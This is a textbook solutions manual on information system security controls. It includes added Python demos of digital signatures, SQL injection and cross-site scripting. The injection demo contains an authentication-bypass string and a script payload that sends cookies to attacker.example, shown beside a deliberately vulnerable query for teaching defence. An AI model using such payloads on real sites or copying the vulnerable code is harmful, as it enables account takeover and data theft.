
Accounting Information Systems

CHAPTER 7 INFORMATION SYSTEM CONTROLS for SYSTEMS RELIABILITY


SUGGESTED ANSWERS TO DISCUSSION QUESTIONS

7.1

1. Encryption is the final layer of preventive controls: encrypting data provides a barrier against an intruder who has already obtained access to company data. Encryption that employs digital signatures and a public key infrastructure (PKI) can also strengthen authentication procedures and helps to ensure and verify the validity of e-business transactions. A digital signature is created by hashing the document and encrypting that hash with the signer's private key; anyone holding the corresponding public key can decrypt it and compare it with the hash of the document they received. Because the private key is known only to its owner, only the owner could have produced the signature. Thus, digital signatures can be used to authenticate a particular party to a transaction as the creator of a document. This provides nonrepudiation: the creator of the digital signature cannot deny having signed the document. A digital certificate is an electronic document, digitally signed by a trusted third party, that certifies the identity of the owner of a public/private key pair. The PKI is the system used to issue, distribute, and manage the public and private keys used in digital signatures and digital certificates. An organization that issues digital certificates is called a certificate authority.

2. The effectiveness of control procedures depends on how well employees understand and follow the organization's security policies. If all employees are taught proper security measures and safe computing practices, such as never opening unsolicited email attachments, using only approved software, not sharing or revealing passwords, and taking steps to physically protect laptops, company-wide security will increase.

3. Firewalls use hardware and software to block unauthorized access to the company's system.

4. An intrusion detection system (IDS) creates logs of the network traffic that the firewall permitted to pass and then analyzes those logs for signs of attempted or successful intrusions. This provides a means to monitor the number of attempted intrusions successfully blocked by the firewall, and can give early warning that the organization is being targeted.

5. A virtual private network (VPN) is a network that controls access to a company's extranet by using encryption, identification, and authentication tools and techniques. (Definition from the text's glossary, p. 794, 10th ed.)
7-1
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

Additional facts: A virtual private network (VPN) increases system reliability by encrypting data prior to sending it over the Internet. The data is then decrypted once it arrives at its intended destination. Thus, a private network is created using the Internet as the network connection and encryption as the method to make it private and secure the data from public disclosure.
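The signing, verification and certificate checks described in answer 1 above, as an added example that is not part of the original solutions manual. It uses a deliberately small textbook RSA (fixed Mersenne primes, no padding) so that it runs with only the Python standard library; the key sizes, the names "Alice" and the certificate authority, the purchase-order text and the certificate layout are assumptions made for illustration, and the scheme must not be used as real cryptography.

```python
import hashlib
import json

# Constructed key material: small Mersenne primes keep the arithmetic readable.
# Real RSA keys are 2048+ bits and use a padding scheme (PSS); this is a
# teaching toy, not a usable signature scheme.
E = 65537


def make_keypair(p, q, e=E):
    """Return ((n, e), (n, d)) for primes p and q."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse of e, Python 3.8+
    return (n, e), (n, d)


def _digest(message: bytes, n: int) -> int:
    """SHA-256 of the message, reduced into the range of the modulus."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private_key) -> int:
    """Digital signature: hash the document, then 'encrypt' the hash with the private key."""
    n, d = private_key
    return pow(_digest(message, n), d, n)


def verify(message: bytes, signature: int, public_key) -> bool:
    """Anyone with the public key can recover the hash and compare it with the document's hash."""
    n, e = public_key
    return pow(signature, e, n) == _digest(message, n)


def canonical(obj) -> bytes:
    """Deterministic encoding so the bytes that get signed are unambiguous."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def issue_certificate(subject: str, subject_public_key, ca_private_key):
    """A certificate authority binds a name to a public key by signing the pair."""
    cert = {"subject": subject, "public_key": list(subject_public_key)}
    return cert, sign(canonical(cert), ca_private_key)


def verify_signed_document(document: bytes, signature: int, cert, cert_signature: int,
                           ca_public_key, expected_subject: str) -> bool:
    """Full PKI check: trust the CA, then the certificate it signed, then the document."""
    if cert["subject"] != expected_subject:
        return False
    if not verify(canonical(cert), cert_signature, ca_public_key):
        return False  # certificate was not issued by the CA we trust
    return verify(document, signature, tuple(cert["public_key"]))


# Constructed key pairs for the CA and for Alice (2**k - 1 for these k are primes).
CA_PUBLIC, CA_PRIVATE = make_keypair(2**89 - 1, 2**107 - 1)
ALICE_PUBLIC, ALICE_PRIVATE = make_keypair(2**31 - 1, 2**61 - 1)
ALICE_CERT, ALICE_CERT_SIG = issue_certificate("Alice", ALICE_PUBLIC, CA_PRIVATE)

# Constructed e-business document.
PURCHASE_ORDER = b"PO-1001: 500 units at $12.50, ship to 1 Main St"

if __name__ == "__main__":
    sig = sign(PURCHASE_ORDER, ALICE_PRIVATE)
    print("genuine order verifies:",
          verify_signed_document(PURCHASE_ORDER, sig, ALICE_CERT, ALICE_CERT_SIG, CA_PUBLIC, "Alice"))
    print("altered order verifies:",
          verify_signed_document(PURCHASE_ORDER + b"0", sig, ALICE_CERT, ALICE_CERT_SIG, CA_PUBLIC, "Alice"))
```

The nonrepudiation argument in the answer is visible in the code: the signature can only be produced from ALICE_PRIVATE, and a certificate signed by anyone other than the trusted CA, or a document altered after signing, fails the check.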

7.2 Having the person responsible for information security report directly to the Chief Information Officer (CIO) raises the visibility, and therefore the perceived importance, of information security at all levels of management and in the company at large. Security must be recognized as a top management issue, and having the information security officer report to a member of the executive committee such as the CIO formalizes it as one. One potential disadvantage is that the CIO may not always react favorably to reports indicating that shortcuts have been taken with security, especially where following a recommendation for increased security spending could mean failing to meet budget goals. Thus, just as the effectiveness of the internal audit function is improved by having it report to someone other than the CFO, the security function may also be more effective if it reports to someone who is not responsible for information systems operations.

7.3

The most effective auditor is a person who has training and experience both as an auditor and as an information systems or computer specialist. However, few people have such an extensive background, and personnel training and development are both expensive and time consuming, so many organizations may find it necessary to accept some tradeoffs in staffing the information systems audit function. Since auditors generally work in teams, one common solution is to include members who have computer training and experience. Then, as audit teams are created for specific purposes, care should be taken to ensure that the members of each team have an appropriate mix of skills and experience. However, in today's technological age, all internal and external auditors on an engagement team must have a sound understanding of basic information security concepts so that, during the course of an audit, they can identify, report, and communicate security risks and exposures to the security specialists on the team for further assessment and investigation.

7.4

To provide absolute information security an organization must follow Jeff Richards' Laws of Data Security: 1. Don't buy a computer. 2. If you buy a computer, don't turn it on.

As this humorous solution indicates, there is no way to make a system absolutely secure. However, as discussed in the text, there are numerous methods to make a system more secure.

7.5

Penetration testing provides a rigorous way to test the effectiveness of an organization's computer security by attempting to break into the organization's information system. Internal audit and external security consulting teams perform penetration tests in which they try to compromise a company's system. Some outside consultants claim that they can get into 90 percent or more of the companies they attack. This is not surprising, given that it is impossible to achieve 100% security. Thus, one limitation of penetration testing is that it almost always shows that there are ways to break into the system. The more important analysis is evaluating how difficult it was to break in and the cost-effectiveness of alternative methods for increasing that level of difficulty. Another limitation is that failure to break in may be due to a lack of skill on the part of the tester rather than to strong security. Finally, penetration testing typically focuses on unauthorized access by outsiders; thus, it does not test for security breaches from internal sources.

7.6

Top management support is essential for the success of any program an entity undertakes. Thus, top management support for, and participation in, security awareness training is essential to maximize its impact on the employees and managers of the firm. Effective instruction and hands-on active learning techniques also help to maximize the benefit of training. Many employees have extensive experience or expertise in security; these employees should be involved in the design and execution of the security training. Real-life examples should be used throughout the training so that employees can see, or at least visualize, the exposures and threats they face as well as the controls in place to address them. Role-playing has been shown to be an effective method of maximizing the impact of security awareness training, especially with regard to social engineering attacks.

7.7

The total quality movement focuses on continuous improvement and the elimination of errors. Security, like quality, is a moving target that can always be improved. Another similarity is the need for active top management support. The focus on quality only began to gain momentum when top management supported the up-front investment needed to improve quality and refused to accept the argument that the benefits of further improvements did not justify the costs required to attain them. Similarly, top management needs to actively support the goal of ever-improving levels of security and the investment necessary to achieve that result.

7.8

What are the advantages and disadvantages of biometric security devices, such as fingerprint readers, in comparison with other security measures such as passwords and locked doors?

The advantages of biometric security devices include:
Security advantages over traditional methods, because physical traits are very difficult to duplicate.
Ease of use.
They cannot be forgotten like passwords and user IDs.
They cannot be left at home, in a rental car, or in a taxi.
They cannot be inadvertently lost or stolen.

Non-biometric access methods such as passwords and keys can be stolen and used by others, lost, or forgotten. It is easier for someone else to obtain tokens, smart cards, or passwords and use them to gain entry to the system. As such, the greatest advantage of biometric devices is that they ARE the person and so cannot be lost, stolen, or forgotten.

Drawbacks to such devices include:
Limited flexibility in responding to changes in the physically measured features. Common problems such as laryngitis, eye infections, and cut fingers alter physical features temporarily.
Non-revocability. If a password is guessed, a new one can be issued; likewise, if a token is lost or stolen, a new one can be issued. However, if a biometric template is compromised it cannot be re-issued (you cannot assign someone a new fingerprint). Thus, secure storage of the template is crucial.
Users may not accept certain types of biometric methods. For example, in some cultures fingerprints may have negative connotations that preclude their widespread use for authentication.


SUGGESTED SOLUTIONS TO THE PROBLEMS

7.1

a. An employee's laptop was stolen at the airport. The laptop contained personally identifying information about the company's customers that could potentially be used to commit identity theft. Solution: Encrypt data stored on company laptops.

b. A salesperson successfully logged into the payroll system by guessing the payroll supervisor's password. Solution: Employ and enforce strong password requirements: at least 8 characters, multiple character types, non-dictionary (random) characters, and frequent changes. Also lock out accounts after 3-5 unsuccessful login attempts.

c. A criminal remotely accessed a sensitive database using the authentication credentials (user ID and strong password) of an IT manager. At the time the attack occurred, the IT manager was logged into the system at his workstation at company headquarters. Solution: Integrate physical and logical security. In this case, the system should reject any attempt by a user to log in remotely if that same user is already logged in from a physical workstation. The system should also notify appropriate security staff of such an incident.

d. An employee received an email purporting to be from her boss informing her of an important new attendance policy. When she clicked on a link embedded in the email to view the new policy, she infected her laptop with a keystroke logger. Solution: Security awareness training is the best way to prevent such problems. Employees should be taught that this is a common example of a sophisticated phishing scam. Detective and corrective controls include anti-spyware software that automatically checks for and removes detected spyware on an employee's computer as part of the logon process for accessing the company's information system.

e. The director of R&D quit abruptly after an argument with the CEO. The company cannot access any of the files about several new projects because the R&D director had encrypted them before leaving. Solution: Adopt a policy that files may only be encrypted using company encryption software, with IT security holding the encryption keys through some form of key escrow. Internal Audit should test that encrypted files can be recovered with the escrowed keys.


f. A company wrote custom code for the shopping cart feature on its web site. The code contained a buffer overflow vulnerability that could be exploited when the customer typed in the ship-to address. Solution: Teach programmers secure programming practices, including the need to carefully check all user input (here, the length of the ship-to address against the space allocated for it). It is also important for management to support the commitment to secure coding practices, even if that means a delay in completing, testing, and deploying new programs. Useful detective controls include making sure programs are thoroughly tested before being put into use and having internal auditors routinely test in-house developed software.

g. A company purchased the leading off-the-shelf e-commerce software for linking its electronic storefront to its inventory database. A customer discovered a way to directly access the back-end database by entering appropriate SQL code. Solution: Insist on secure code as part of the specifications for purchasing any third-party software. Thoroughly test the software prior to use. Employ a patch management program so that any vendor-provided fixes and patches are implemented immediately.

h. Attackers broke into the company's information system through a wireless access point located in one of its retail stores. The wireless access point had been purchased and installed by the store manager without informing central IT or security. Solution: Enact a policy that forbids the installation of unauthorized wireless access points. Conduct routine audits for unauthorized or rogue wireless access points.

i. An employee picked up a USB drive in the parking lot and plugged it into their laptop to see what was on it, which resulted in a keystroke logger being installed on that laptop. Solution: The best preventive control is security awareness training. Teach employees never to insert USB drives unless they are absolutely certain of their source. In addition, employ anti-spyware software that automatically checks for and removes detected spyware on an employee's computer as part of the logon process for accessing the company's information system.

j. A competitor intercepted the company's bid for a lucrative contract that was emailed to the local government's web site. The competitor used the information contained in the email to successfully underbid and win the contract. Solution: Encrypt sensitive files sent via email, or send sensitive files over a secure channel.


k. When an earthquake destroyed the company's main data center, the CIO spent half a day trying to figure out who in the organization needed to be contacted in order to implement the company's cold site agreement. Solution: Implement and document emergency response procedures. Periodic testing would likely uncover such problems before an actual disaster.

l. Although logging was enabled, the information security staff did not review the logs early enough to detect and stop an attack that resulted in the theft of information about a new strategic initiative. Solution: Implement and enforce log review and analysis policies through proper management oversight of the information security staff, or contract with a security information management service to perform such analysis.

m. To facilitate working from home, an employee installed a modem on his office workstation. An attacker successfully penetrated the company's system by dialing into that modem. Solution: Routinely check for unauthorized or rogue modems by dialing all telephone numbers assigned to the company and identifying those that answer with a modem.

n. An attacker gained access to the company's internal network by installing a wireless access point in a wiring closet located next to the elevators on the fourth floor of a high-rise office building that the company shared with seven other companies. Solution: Secure or lock all wiring closets. Require strong authentication for all attempts to log into the system from a wireless client. Employ an intrusion detection system.

7.2 Solution: The article in the Journal of Accountancy is very well written and the instructions are easy to follow. If students follow the instructions they will have no problem completing the problem and will learn a new tool in Excel. It is expected that the instructor will familiarize themselves with the article prior to grading the assignment; however, the following are some screenshots of what the instructor may expect from student submissions.

Part b.



Part c., sub-parts : a. password to open, b. password to modify, c. apply password to individual sheets, e. set workbook to be Read-only


Part c sub-part d. Encrypt the data



Part c sub-part f-1 protect cells.


Part c sub-part f-2 protect sheet.


7.3

a. Access control matrix. Codes for type of access: 0 = No Access Permitted; 1 = Read and Display Only; 2 = Read, Display, and Update; 3 = Read, Display, Update, Create, and Delete.

                              Payroll   Inventory   Payroll   Inventory   System
System User                   Program   Update Pgm  Master    Master      Log Files
Salesperson                      0          0          0          1          0
Inventory Control Analyst        0          0          0          3          0
Payroll Analyst                  0          0          2          0          0
Human Resources Manager          0          0          3          0          0
Payroll Programmer               3          0          1          0          1
Inventory Programmer             0          3          0          1          1
Data Processing Manager          1          1          1          1          1
Data Security Administrator      3          3          3          3          3

b. Inventory control analyst: should not have create and delete rights to the inventory master file; this analyst should have only read, display, and update rights (code 2) to the inventory master file. Payroll analyst: should not have create and delete rights to the payroll master file; this analyst should have only read, display, and update rights (code 2) to the payroll master file. Human resources manager: should have only read, display, and update rights (code 2) to the payroll master file.

7.4

The Microsoft Baseline Security Analyzer (MBSA) allows users to scan a computer for common security misconfigurations. MBSA scans the operating system and other installed components, such as Internet Information Services (IIS) and SQL Server, for security misconfigurations and checks whether they are up to date with respect to recommended security updates. Grading depends upon the instructor's judgment about the quality of the report. MBSA provides a list of weaknesses and how to correct them.

7.5

Grading depends upon the instructor's judgment about the quality of the report; however, the student's report should contain the student's perspective on how these websites promote computer security and controls.

The SANS Institute (www.sans.org) is essentially a commercial site selling security training. However, the site does contain over 1500 white papers on computer security, divided into 71 categories that range from Acceptable Use to Work Monitoring. Students should be able to find articles on almost any audit-related topic of interest to them.

The National Security Agency (www.nsa.gov) is a governmental website that explains and promotes the National Security Agency. Of interest to auditors is its work on data security. The publicly available work can be accessed from the Research link, which lists published scholarly work and work presented at conferences. Many articles deal with software, data, and systems security.

The Information Systems Audit and Control Association (www.isaca.org) is a very extensive source of information for the auditor. Just about anything on this website would be of use to an auditor, depending on their level of experience and responsibility. Since this website is so extensive, instructors may want to recommend that students limit this portion of their report to three areas of interest on the site.

The Information Systems Security Association (www.issa.org) is the website of a professional organization on security. Students will find white papers and webcasts on security topics of general and specific interest. The drawback of this website is that access is limited to members. A student membership is available for $30, and there is a free 90-day trial membership; students will have to join as a student or trial member to gain access to the information on the site.

CERT (www.cert.org) is the website of the Carnegie Mellon University Software Engineering Institute (SEI). The website is a good resource for information about software assurance, secure systems, organizational security, and coordinated response. The resources available are extensive, but they are written for academics, so they may be a little deep for students who have little experience with programming.

The American Institute of Certified Public Accountants (www.aicpa.org) is an excellent website for information pertinent to auditors. Students may access the website and the associated journal articles that target professionals. Students will have an easier time accessing and reading the information on this website since the target audience is accounting professionals.

The National Institute of Standards and Technology (www.nist.gov) is a government website. Its Computer Security Division is the part of the site of greatest interest and use to accounting students; it contains a great deal of information on computer security.

The Computer Crime and Intellectual Property Section of the U.S. Department of Justice (www.cybercrime.gov) is another government website that provides information related to cyber crime in the form of news releases and cases. The case summaries in the news releases will be of the most use to students.

7.6

Grading depends upon the instructor's judgment about the quality of the report. Beware that although the Center for Internet Security does not charge for its benchmarking software downloads, it does require the student to register with the organization. Some students may object to this. In addition, it is unlikely that a lab administrator will allow students to download software onto lab hardware.

7.7

a. XYZ Company is secure under the best case scenario but does not meet security requirements under the worst case scenario.

P = 25 minutes
D = 5 minutes (best case), 10 minutes (worst case)
C = 6 minutes (best case), 20 minutes (worst case)

Time-based model: P > D + C
Best case: P is greater than D + C (25 > 5 + 6 = 11)
Worst case: P is less than D + C (25 < 10 + 20 = 30)

From the Best/Worst Case Table below it is apparent that each of the three investment options, and all three combined, meets the security requirement P > D + C under both the best and the worst case scenario. Only the current arrangement fails, and only in the worst case, where the penetration time is less than the detection time plus the correction time. The Best Case and Worst Case Tables show the cost per minute of security margin (cost differential divided by the time differential P - (D + C)) for the current situation, the three investment options, and the three options combined. Option 1 is the most cost-effective single option, at $2,083 per minute in the best case and $10,000 per minute in the worst case. If XYZ chose to invest in all three options it would also meet the security requirements under both scenarios, and would have the lowest worst-case cost per minute ($7,143), but the total cost would be $150,000.

Best/Worst Case Table (best case / worst case)

            Cost          Penetration   P vs     Total Time   Detection   Analyze &
            Differential  (P)           D + C    (D + C)      (D)         Correct (C)
Current     $0            25 / 25       > / <    11 / 30      5 / 10      6 / 20
Option 1    $50,000       35 / 35       > / >    11 / 30      5 / 10      6 / 20
Option 2    $40,000       25 / 25       > / >     7 / 24      1 / 4       6 / 20
Option 3    $60,000       25 / 25       > / >     9 / 20      5 / 10      4 / 10

Best Case Table

            Cost          Penetration   P vs     Total Time   Time          Cost/minute
            Differential  (P)           D + C    (D + C)      Differential  (Cost / Time Differential)
Current     $0            25            >        11           14            $0
Option 1    $50,000       35            >        11           24            $2,083
Option 2    $40,000       25            >         7           18            $2,222
Option 3    $60,000       25            >         9           16            $3,750
Combined    $150,000      35            >         5           30            $5,000

Worst Case Table

            Cost          Penetration   P vs     Total Time   Time          Cost/minute
            Differential  (P)           D + C    (D + C)      Differential  (Cost / Time Differential)
Current     $0            25            <        30           -5            $0
Option 1    $50,000       35            >        30            5            $10,000
Option 2    $40,000       25            >        24            1            $40,000
Option 3    $60,000       25            >        20            5            $12,000
Combined    $150,000      35            >        14           21            $7,143


7.8 To encrypt a file or folder: 1. Open Windows Explorer. 2. Right-click the file or folder that you want to encrypt, and then click Properties. 3. On the General tab, click Advanced. 4. Select the "Encrypt contents to secure data" check box.

To create new user accounts: click Start, Control Panel, double-click User Accounts, and follow the prompts of the User Account Creation Wizard. To create or change the password, double-click the new user account icon, select the Change The Password menu option, and follow the prompts.

a. Actions that can be performed using the new User Account:
1. Open the file - No
2. Copy the file to another location on the hard drive - No
3. Copy the file to a USB drive - No
4. Move the file to another location on the hard drive - Yes
5. Move the file to a USB drive - No
6. Rename the file - Yes
7. Delete the file - Yes
8. Restore the deleted file and open it - No, a restored file still cannot be opened

b. Actions that can be performed by the account that encrypted the file:
9. Everything. However, when copying or moving the file to a USB device the user is warned that the action will create an unencrypted copy of the file.

7.9 Solution: (Solutions will vary from student to student and from institution to institution.) The student's table should have a row for each password policy attribute and a column for each system:

#   Description                                            a. School network   b. School email   c. Personal email   d. Financial institution
1   Password length (minimum and maximum)
2   Types of characters
3   Frequency of mandatory changes
4   Password history (can an old password be used again)

Explanations of the reasons for any differences should focus on the relative value/importance of the data contained in each system.

7.10 Solution: Reports will vary from student to student; however, the reports should contain at least some of the following basic facts gathered from the text, cgisecurity.net, and wikipedia:

a. Buffer overflows. One of the more common input-related vulnerabilities is the buffer overflow, in which an attacker sends a program more data than the space reserved for it can hold. Buffer overflows may cause the system to crash or, even worse, may give the attacker a command shell running with the privileges of the vulnerable program, often full administrative control of the device. Because buffer overflows are so common, it is instructive to understand how they work. Programs are loaded into RAM when they run. A program frequently calls a subroutine to perform a specific function. Information about the state of the calling code, including the address in RAM of the instruction to execute when the subroutine returns, is stored in an area of RAM called the stack. The subroutine's local variables, including any fixed-size buffer that holds input, are placed on the same stack next to that saved return address. A buffer overflow occurs when more data is written to the buffer than it can hold, so that the adjoining return address is overwritten. When the subroutine finishes, the processor transfers control to whatever address is now stored there. In a buffer overflow attack the input is crafted so that the overwritten return address points back into the buffer itself. Since the buffer has been filled with data sent by the attacker, that location contains machine instructions that let the attacker take control of the system. Buffer overflows can only occur if the programmer failed to check that the amount of input fits in the space allocated for it (or used a library routine that performs no such check). Thus, sound programming practices can prevent buffer overflow attacks. Therefore, internal auditors should routinely test all applications developed in-house to be sure that they are not vulnerable to buffer overflow attacks.

b. SQL injection. Many web pages take input or a request from a web user and, to process it, build a Structured Query Language (SQL) query against the database behind the page. For example, when a user logs in, the user name and password are used to query the database to determine whether the user is valid. With SQL injection, it is possible to send a specially crafted user name or password that changes the SQL query into something else, i.e., injects new SQL into the query, and thereby bypasses the authentication control and gains access to the database. This can allow an attacker not only to steal data from the database but also to modify or delete data, or the entire database.

c. Cross-site scripting. Cross-site scripting (XSS) occurs when a web application accepts malicious data from a user and later sends it back to other users' browsers as part of a page. The data is usually delivered in the form of a hyperlink that contains the malicious content. The victim will most likely click the link from another website, an instant message, or simply while reading a web board or email message. Usually the attacker encodes the malicious portion of the link so that the request looks less suspicious when clicked. After the web application receives the data, it builds an output page for the user containing the malicious data it was originally sent, in a manner that makes it appear to be valid content from the website. Many popular guestbook and forum programs allow users to submit posts with HTML and JavaScript embedded in them. If, for example, a user logged in as "john" reads a message by "joe" that contains malicious JavaScript, it may be possible for "joe" to hijack john's session simply by john reading the bulletin board post.
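The login-query injection in (b) (and the purchased-software SQL problem in Problem 7.1 g) and the stored forum-script case in (c), in one added example that is not part of the original solutions manual or of any product it mentions. It uses Python's built-in sqlite3 and html modules; the in-memory users table, the user names, the attacker input and the page template are constructed assumptions made for illustration, and each vulnerable routine is shown beside its hardened form.

```python
import html
import sqlite3


def build_database() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the web application's back-end database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("john", "correct horse"), ("joe", "hunter2")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """String-built query: the user's input becomes part of the SQL text itself."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0] > 0


def login_hardened(conn, username: str, password: str) -> bool:
    """Parameterized query: the driver passes the input as data, never as SQL."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] > 0


# Forum page for the cross-site scripting case (c).
PAGE = "<html><body><h1>Board</h1>{posts}</body></html>"


def render_post_vulnerable(author: str, body: str) -> str:
    """Interpolates the post verbatim, so an embedded <script> runs in every reader's browser."""
    return PAGE.format(posts="<p><b>%s</b>: %s</p>" % (author, body))


def render_post_hardened(author: str, body: str) -> str:
    """Escapes <, >, &, and quotes so the browser displays the text instead of executing it."""
    return PAGE.format(posts="<p><b>%s</b>: %s</p>"
                       % (html.escape(author), html.escape(body)))


# Constructed attacker input for both cases.
INJECTED_USERNAME = "admin' OR '1'='1' --"   # the -- comments out the password check
MALICIOUS_POST = ('<script>document.location="http://attacker.example/?c="'
                  '+document.cookie</script>')

if __name__ == "__main__":
    db = build_database()
    print("vulnerable login bypassed:", login_vulnerable(db, INJECTED_USERNAME, "anything"))
    print("hardened login bypassed:  ", login_hardened(db, INJECTED_USERNAME, "anything"))
    print("vulnerable page ships script:", "<script>" in render_post_vulnerable("joe", MALICIOUS_POST))
    print("hardened page ships script:  ", "<script>" in render_post_hardened("joe", MALICIOUS_POST))
```

The injected user name turns the vulnerable query into `... WHERE username = 'admin' OR '1'='1' --' AND password = ...`, which is true for every row, while the parameterized query simply looks for a user literally named `admin' OR '1'='1' --` and finds none. Output escaping plays the same role for (c): the stored post is displayed as text, so joe's script never reaches john's browser as code.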

7.11 Depending on the sensitivity and value of the data processed and stored at a data center, all 19 methods could be used by a corporation. For example, IBM is extremely concerned about the loss of data and trade secrets due to disasters and corporate espionage and employs all 19 methods; however, most corporations do not employ all 19. Thus, the following solution is an approximation of the methods that a typical corporation may employ and the more extensive methods that a financial institution would choose. The methods that any corporation would employ would also be employed at financial institutions, but are not checked in the second column, to more clearly highlight the differences.

Method                                           Any Corporation    Extra methods justified at a Financial Institution
1. Build on the right spot
2. Have redundant utilities
3. Pay attention to walls
4. Avoid windows
5. Use landscaping for protection
6. Keep a 100-foot buffer zone around the site
7. Use retractable crash barriers at vehicle entry points
8. Plan for bomb detection
9. Limit entry points
10. Make fire doors exit only
11. Use plenty of cameras
12. Protect the building's machinery
13. Plan for secure air handling
14. Ensure nothing can hide in the walls and ceilings
15. Use two-factor authentication
16. Harden the core with security layers
17. Watch the exits too
18. Prohibit food in the computer rooms
19. Install visitor restrooms

SUGGESTED SOLUTIONS TO THE CASES

7-1 Solution: Reports will vary from student to student, but the table below identifies corporate-grade firewalls that may or may not be included in student reports.

SonicGuard Pro 5060
  Cost: $9,371
  Filtering capability: Deep packet and Web content
  Other security features: IPSec VPN, layered anti-virus, anti-spyware, intrusion prevention
  Ease of configuration: Complex - professional network administrator needed
  Ease of use: Complex - professional network administrator needed

Fortinet 1000A
  Cost: $24,745
  Filtering capability: Deep packet, Web content, stateful inspection
  Other security features: IPSec VPN, layered anti-virus, anti-spyware, intrusion prevention, antispam
  Ease of configuration: Complex - professional network administrator needed
  Ease of use: Complex - professional network administrator needed

Barracuda 910
  Cost: $28,500
  Filtering capability: Deep packet, Web content, stateful inspection
  Other security features: IPSec VPN, layered anti-virus, anti-spyware, intrusion prevention, antispam
  Ease of configuration: Complex - professional network administrator needed
  Ease of use: Complex - professional network administrator needed

SunScreen Secure Net 3.1
  Cost: $14,995
  Filtering capability: Dynamic packet filtering, stateful inspection
  Other security features: VPN
  Ease of configuration: Complex - professional network administrator needed
  Ease of use: Complex - professional network administrator needed

7-2 The answers to this case will vary by student. Make sure that the student prepares questions for preventive, detective, and corrective controls, with appropriate subcategories for each topic, and that the questions can be answered with yes, no, or not applicable. For example, under the heading of preventive controls there should be questions about the existence of various authentication methods, an access control matrix, training, physical access controls, firewalls, wireless access, host and application hardening, and encryption. Questions should be objective and focus on the existence of specific controls that the text suggests should be in place, such as "The main firewall employs stateful packet inspection." In this way, yes answers are evidence that security is effective, whereas no answers are evidence of potential security vulnerabilities.
